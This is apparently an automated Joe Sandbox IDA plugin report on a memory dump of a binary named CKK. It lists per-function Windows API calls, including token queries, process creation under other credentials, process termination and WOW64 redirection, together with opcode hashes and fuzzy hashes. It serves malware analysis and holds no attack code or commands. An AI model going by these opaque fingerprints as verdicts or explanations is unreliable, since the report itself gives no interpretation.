                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                          • String ID:
                                          • API String ID: 72514467-0
                                          • Opcode ID: 0d6001b61c0edda3fa8f9e9c9e5deb0f10f1cc227dec6e00c004cb9fb51ff51d
                                          • Instruction ID: faf10d4f2e7820a5b406741725f825797ec148135719de54c3c35dec55a70770
                                          • Opcode Fuzzy Hash: 0d6001b61c0edda3fa8f9e9c9e5deb0f10f1cc227dec6e00c004cb9fb51ff51d
                                          • Instruction Fuzzy Hash: 262107B16052017BEB155B39AC0AE7B7BDCDF8A760F10502AF809EE1D1DEA1EC00C2A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E43AA2: GetFullPathNameW.KERNEL32 ref: 00E43AC2
                                          • _wcslen.LIBCMT ref: 00EB587B
                                          • CoInitialize.OLE32 ref: 00EB5995
                                          • CoCreateInstance.OLE32 ref: 00EB59AE
                                          • CoUninitialize.OLE32 ref: 00EB59CC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                          • String ID: .lnk
                                          • API String ID: 3172280962-24824748
                                          • Opcode ID: cf30eff35cfb344b81d1ca51b5ddf31d0d981713cc1ccf01e2524fdede9dd7e8
                                          • Instruction ID: efc111af340f888dc017c464b0ad053b320e9fe2f8cf764c41d62032c8b0cebb
                                          • Opcode Fuzzy Hash: cf30eff35cfb344b81d1ca51b5ddf31d0d981713cc1ccf01e2524fdede9dd7e8
                                          • Instruction Fuzzy Hash: 0ED16472A087019FC714DF24C480A6BBBE1EF89714F14985DF899AB361DB31EC45CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EA0FB4: GetTokenInformation.ADVAPI32 ref: 00EA0FCA
                                            • Part of subcall function 00EA0FB4: GetLastError.KERNEL32 ref: 00EA0FD6
                                            • Part of subcall function 00EA0FB4: GetProcessHeap.KERNEL32 ref: 00EA0FE5
                                            • Part of subcall function 00EA0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EA0FEC
                                            • Part of subcall function 00EA0FB4: GetTokenInformation.ADVAPI32 ref: 00EA1002
                                          • GetLengthSid.ADVAPI32(?,00000000,00EA1335), ref: 00EA17AE
                                          • GetProcessHeap.KERNEL32 ref: 00EA17BA
                                          • HeapAlloc.KERNEL32(00000000), ref: 00EA17C1
                                          • CopySid.ADVAPI32 ref: 00EA17DA
                                          • GetProcessHeap.KERNEL32 ref: 00EA17EE
                                          • HeapFree.KERNEL32(00000000), ref: 00EA17F5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 3008561057-0
                                          • Opcode ID: 45b086bf88dcee8625e626b7714ca2d0df3268a492d03d8667c4b993e6b22f59
                                          • Instruction ID: a730db22cb49a51665b7ba171a6345e474ba00baf55a3c1d29c21ab1d3978dc5
                                          • Opcode Fuzzy Hash: 45b086bf88dcee8625e626b7714ca2d0df3268a492d03d8667c4b993e6b22f59
                                          • Instruction Fuzzy Hash: 9611E131506206FFDB108FA4DC48FAE7BB8EB4B359F20605AF441BB150C731A944CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00EA14FF
                                          • OpenProcessToken.ADVAPI32 ref: 00EA1506
                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EA1515
                                          • CloseHandle.KERNEL32(00000004), ref: 00EA1520
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EA154F
                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00EA1563
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 1413079979-0
                                          • Opcode ID: d281599537196fea392ca71bbfa90361465db7c896bcb64a770b1d4a394fb1f9
                                          • Instruction ID: 620e614c07e9cd8a24927c0a678fab361a2a417e3a727b7359f4ee3fe8221be6
                                          • Opcode Fuzzy Hash: d281599537196fea392ca71bbfa90361465db7c896bcb64a770b1d4a394fb1f9
                                          • Instruction Fuzzy Hash: 1D11897250120AAFDF118FA8ED09BDE3BA9EF49748F144056FA05B60A0C371DE64DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32 ref: 00E63390
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E6339E
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E633B7
                                          • SetLastError.KERNEL32(00000000,?,00E63379,00E62FE5), ref: 00E63409
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 14847ae54daa1f088471dde6affeabbdac01ee85e24f91b95f588df06a4f45ca
                                          • Instruction ID: e02629d24045e691c59801bcf201368607c2b4cbedd1fa2aec1a85c3f1efa03f
                                          • Opcode Fuzzy Hash: 14847ae54daa1f088471dde6affeabbdac01ee85e24f91b95f588df06a4f45ca
                                          • Instruction Fuzzy Hash: 7E01D4326C9312BEEA252775BC8556B2E94EB157F9720232AF520F12F0EF114E16A584
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32 ref: 00E72D78
                                          • _free.LIBCMT ref: 00E72DAB
                                          • _free.LIBCMT ref: 00E72DD3
                                          • SetLastError.KERNEL32(00000000,?,?,?,?,00E6E6D1,?,00F08A48,00000010,00E44F4A,?,?,00000000,00E83CD6), ref: 00E72DE0
                                          • SetLastError.KERNEL32(00000000,?,?,?,?,00E6E6D1,?,00F08A48,00000010,00E44F4A,?,?,00000000,00E83CD6), ref: 00E72DEC
                                          • _abort.LIBCMT ref: 00E72DF2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: f8602d14bd92ebdad4a61c8b89eb7576827ad0559092ce5e82a2d9625ba722db
                                          • Instruction ID: f4f44b87e7a7f2cad65053029bfcf22b073f2c3f642cc767a77613655dc20213
                                          • Opcode Fuzzy Hash: f8602d14bd92ebdad4a61c8b89eb7576827ad0559092ce5e82a2d9625ba722db
                                          • Instruction Fuzzy Hash: F1F028319056013BC6322339BC06E5A26A9AFC17A4F34E11DFB2CB21E6EF2088825260
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E59639: ExtCreatePen.GDI32 ref: 00E59693
                                            • Part of subcall function 00E59639: SelectObject.GDI32 ref: 00E596A2
                                            • Part of subcall function 00E59639: BeginPath.GDI32 ref: 00E596B9
                                            • Part of subcall function 00E59639: SelectObject.GDI32 ref: 00E596E2
                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00ED8A4E
                                          • LineTo.GDI32(?,00000003,00000000), ref: 00ED8A62
                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00ED8A70
                                          • LineTo.GDI32(?,00000000,00000003), ref: 00ED8A80
                                          • EndPath.GDI32 ref: 00ED8A90
                                          • StrokePath.GDI32(?), ref: 00ED8AA0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          • Opcode ID: 92811e0ce3a2b15a05f74afbbe62621b5e33b1af4d5697fa722a79b229afbf88
                                          • Instruction ID: 3d8d872bbe340496467df8325d04dcae833a2bf500abad9110ff38416d0d15c4
                                          • Opcode Fuzzy Hash: 92811e0ce3a2b15a05f74afbbe62621b5e33b1af4d5697fa722a79b229afbf88
                                          • Instruction Fuzzy Hash: 9511097600114DFFDF129F91EC88EEA7F6CEB08394F108012BA19AA1A1C7719D59DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDC.USER32(00000000), ref: 00EA5218
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EA5229
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EA5230
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00EA5238
                                          • MulDiv.KERNEL32 ref: 00EA524F
                                          • MulDiv.KERNEL32 ref: 00EA5261
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          • Opcode ID: 7e6cacf4d2f4e7872cb65bbdbaceb291baddaf895ab6bb396414af7fcd189048
                                          • Instruction ID: 5ee6e5e43251f6c8ee21dd1dbc540f1468e018313bd64d945987c263a9ebe22b
                                          • Opcode Fuzzy Hash: 7e6cacf4d2f4e7872cb65bbdbaceb291baddaf895ab6bb396414af7fcd189048
                                          • Instruction Fuzzy Hash: 49018F75A01719BFEB109BA69C49B4EBFB8EF48751F144066FA04BB290D6709804CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32 ref: 00EAEB30
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EAEB46
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00EAEB55
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00EAEB64
                                          • TerminateProcess.KERNEL32 ref: 00EAEB6E
                                          • CloseHandle.KERNEL32(00000000), ref: 00EAEB75
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: e4268b1669d5fc7ef357529e9ed540a846981f4a7a119c641700315fedf604ac
                                          • Instruction ID: 150cd661603dbfd7cf676f9841ff766ae6dbcb98c4eb4d3ad65efa942c1276ed
                                          • Opcode Fuzzy Hash: e4268b1669d5fc7ef357529e9ed540a846981f4a7a119c641700315fedf604ac
                                          • Instruction Fuzzy Hash: CFF06D72142129BFEA205B53AC0DEAF3B7CEBCAF51F10015AF611E109097A05A05C6B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetClientRect.USER32 ref: 00E97452
                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E97469
                                          • GetWindowDC.USER32(?), ref: 00E97475
                                          • GetPixel.GDI32(00000000,?,?), ref: 00E97484
                                          • ReleaseDC.USER32(?,00000000), ref: 00E97496
                                          • GetSysColor.USER32 ref: 00E974B0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                          • String ID:
                                          • API String ID: 272304278-0
                                          • Opcode ID: f2e48a5e8a203443d3c33271ce0f9735b5c93dfd994dafb16a654df9d47eecf3
                                          • Instruction ID: 6b1abf6515557d62da2d50c6614d7234559e2bc744a6dd33fd0f560afca48da2
                                          • Opcode Fuzzy Hash: f2e48a5e8a203443d3c33271ce0f9735b5c93dfd994dafb16a654df9d47eecf3
                                          • Instruction Fuzzy Hash: EC018B31405216EFDB105FA5EC08BEE7BB6FB04751F210161F925B21A1CB311E49EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WaitForSingleObject.KERNEL32 ref: 00EA187F
                                          • UnloadUserProfile.USERENV(?,?), ref: 00EA188B
                                          • CloseHandle.KERNEL32(?), ref: 00EA1894
                                          • CloseHandle.KERNEL32(?), ref: 00EA189C
                                          • GetProcessHeap.KERNEL32 ref: 00EA18A5
                                          • HeapFree.KERNEL32(00000000), ref: 00EA18AC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: 715406c03e5c085824a071c9258aaedfa3a43c1dddc250e49885c144f7f14695
                                          • Instruction ID: d614da822dc974fa651dc61df538268893f676eacd53a44d8fa61df08f34cb84
                                          • Opcode Fuzzy Hash: 715406c03e5c085824a071c9258aaedfa3a43c1dddc250e49885c144f7f14695
                                          • Instruction Fuzzy Hash: 4BE0ED36046112FFDB016FA2FD0C905BF39FF497627208222F225A10B1CB325464DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E47620: _wcslen.LIBCMT ref: 00E47625
                                          • GetMenuItemInfoW.USER32 ref: 00EAC6EE
                                          • _wcslen.LIBCMT ref: 00EAC735
                                          • SetMenuItemInfoW.USER32 ref: 00EAC79C
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EAC7CA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info_wcslen$Default
                                          • String ID: 0
                                          • API String ID: 1227352736-4108050209
                                          • Opcode ID: 605847fbf6f0bbd9b3591af18473fc3ff2abecb18655f213a9d8b8fb0ede521b
                                          • Instruction ID: cbc50b5b6453b23a3a1e6e7a0336678204d605d018395e37335225295087895a
                                          • Opcode Fuzzy Hash: 605847fbf6f0bbd9b3591af18473fc3ff2abecb18655f213a9d8b8fb0ede521b
                                          • Instruction Fuzzy Hash: 2351F1716043019BD715DF38C845BAB77E4AF8E318F242A2AF991FB190DB60E844CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00ECAEA3
                                            • Part of subcall function 00E47620: _wcslen.LIBCMT ref: 00E47625
                                          • GetProcessId.KERNEL32(00000000), ref: 00ECAF38
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECAF67
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                          • String ID: <$@
                                          • API String ID: 146682121-1426351568
                                          • Opcode ID: 718ab0be92067c34ef975ceafcb9c407074784871bf4bf28c79ce06a66bba878
                                          • Instruction ID: be7966c8a278d4893d5704f8a0107b02a26ef6b9975dee78fced07550e577778
                                          • Opcode Fuzzy Hash: 718ab0be92067c34ef975ceafcb9c407074784871bf4bf28c79ce06a66bba878
                                          • Instruction Fuzzy Hash: 7F715470A002199FCB14DF54D584A9EBBF1EF08318F0894ADE856BB352CB35ED46CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CoCreateInstance.OLE32 ref: 00EA7206
                                          • SetErrorMode.KERNEL32(00000001), ref: 00EA723C
                                          • GetProcAddress.KERNEL32 ref: 00EA724D
                                          • SetErrorMode.KERNEL32(00000000), ref: 00EA72CF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: DllGetClassObject
                                          • API String ID: 753597075-1075368562
                                          • Opcode ID: 4f028085f7fdb0b7a35351b5efafca64da0cf17e9a8bda4de1e5ac6f21c51942
                                          • Instruction ID: 977ad8cc838fc0e221e033bbc923bb2a4ae59e945a5346e7ca7e94f7752afa8f
                                          • Opcode Fuzzy Hash: 4f028085f7fdb0b7a35351b5efafca64da0cf17e9a8bda4de1e5ac6f21c51942
                                          • Instruction Fuzzy Hash: D5418EB1604204AFDB15CF54CC84B9A7BB9EF49314F2490AABD45EF21AD7B0E945CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00ED2F8D
                                          • LoadLibraryW.KERNEL32(?), ref: 00ED2F94
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00ED2FA9
                                          • DestroyWindow.USER32 ref: 00ED2FB1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                          • String ID: SysAnimate32
                                          • API String ID: 3529120543-1011021900
                                          • Opcode ID: 9349e014e0ce185d58f7e3685ac2ab1c88fca2f51a8ecaf3a2c6cf7fda0ecd43
                                          • Instruction ID: b71acb02d47604ac5bd48fb0be1ee07bfae6c61e0688dfc2a78c68a40d7f74ba
                                          • Opcode Fuzzy Hash: 9349e014e0ce185d58f7e3685ac2ab1c88fca2f51a8ecaf3a2c6cf7fda0ecd43
                                          • Instruction Fuzzy Hash: 2C219F71204205AFEB104F64DC80EBB37B9EB69368F106A1EFA50F2290D772DC52A760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 961263a0705ac434497514321bf30bba9a01d767c6c041685291de66b7b8a5d8
                                          • Instruction ID: c7322128ec536831a87c3b8e78fd65c9853a6815767fe1da06cd6706fb20e3f2
                                          • Opcode Fuzzy Hash: 961263a0705ac434497514321bf30bba9a01d767c6c041685291de66b7b8a5d8
                                          • Instruction Fuzzy Hash: A7F0AF74A41219BFDB109F91EC09BAEBBB8EF44795F1001A5F805B22A0CF705984DA91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00E44E9C
                                          • GetProcAddress.KERNEL32 ref: 00E44EAE
                                          • FreeLibrary.KERNEL32 ref: 00E44EC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 145871493-3689287502
                                          • Opcode ID: 0d49e1595c5238e619a4dec6f29f2cc96fdf1d5d982c0dea5d696a144cfc7cf5
                                          • Instruction ID: a5b8a858ae6d76e5c5b7353a520cca2b82410db50d34fdd949574660c2285df4
                                          • Opcode Fuzzy Hash: 0d49e1595c5238e619a4dec6f29f2cc96fdf1d5d982c0dea5d696a144cfc7cf5
